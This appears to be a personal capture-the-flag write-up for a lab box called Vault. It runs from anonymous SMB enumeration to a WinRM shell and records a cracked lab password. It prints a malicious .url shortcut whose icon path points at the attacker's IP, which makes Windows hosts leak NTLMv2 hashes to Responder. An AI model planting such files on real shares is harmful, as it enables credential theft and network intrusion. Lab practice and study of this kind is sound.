SMB

Null share

do_connect: Connection to 192.168.227.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	DocumentsShare  Disk
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

╰─ smbclient --no-pass   //192.168.143.172/DocumentsShare
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Nov 19 03:59:02 2021
  ..                                  D        0  Fri Nov 19 03:59:02 2021

		7706623 blocks of size 4096. 714067 blocks available
smb: \> exit
╭─      /home/kali/Vault ▓▒░────────────────────────────────────────────────────────░▒▓ ✔  12s    root@kali 
╰─ echo "lol" > lol.txt
╭─      /home/kali/Vault ▓▒░─────────────────────────────────────────────────────────────────░▒▓ ✔  root@kali 
╰─ smbclient --no-pass   //192.168.143.172/DocumentsShare
Try "help" to get a list of possible commands.
smb: \> upload lol.txt
upload: command not found
smb: \> put lol.txt
putting file lol.txt as \lol.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \> ls
  .                                   D        0  Wed Jul 20 16:59:53 2022
  ..                                  D        0  Wed Jul 20 16:59:53 2022
  lol.txt                             A        4  Wed Jul 20 16:59:53 2022

		7706623 blocks of size 4096. 714036 blocks available
smb: \> 

We also have write permissions on the share.

PORT    STATE SERVICE       REASON          VERSION
445/tcp open  microsoft-ds? syn-ack ttl 127
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| smb-protocols: 
|   dialects: 
|     2.0.2
|     2.1
|     3.0
|     3.0.2
|_    3.1.1
| smb2-capabilities: 
|   2.0.2: 
|     Distributed File System
|   2.1: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0.2: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.1.1: 
|     Distributed File System
|     Leasing
|_    Multi-credit operations
|_smb-print-text: false
| smb2-time: 
|   date: 2022-07-20T19:47:10
|_  start_date: N/A
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb-mbenum: 
|_  ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

SO because i realized that the null share i had write access to we could upload some sort of file that would allow us to capture hasehs with responder, because in the tj null list it said that this one required MIITM.

GitBook

I covered this form of attack on one of my attack vector sections.

batcat not-virus.url
───────┬─────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: not-virus.url
───────┼─────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ [InternetShortcut]
   2   │ URL=anything
   3   │ WorkingDirectory=anything
   4   │ IconFile=\\192.168.49.100\%USERNAME%.icon
   5   │ IconIndex=1
───────┴─────────────────────────────────────────────────────────────────────────────────────────────────────────────

After cracking the NTLMv2 hash the password for the user anirudh was SecureHM.

• CME

• psexec

• winrm

• kerberoast

• aesproast

• ldap

• rpc

• smbmap

• rdp

• spray with other users

Using CME i had access to C$ Share and I could write on it. The User could not write on ADMIN so I was not able to use psexec. I got a shell through winrm.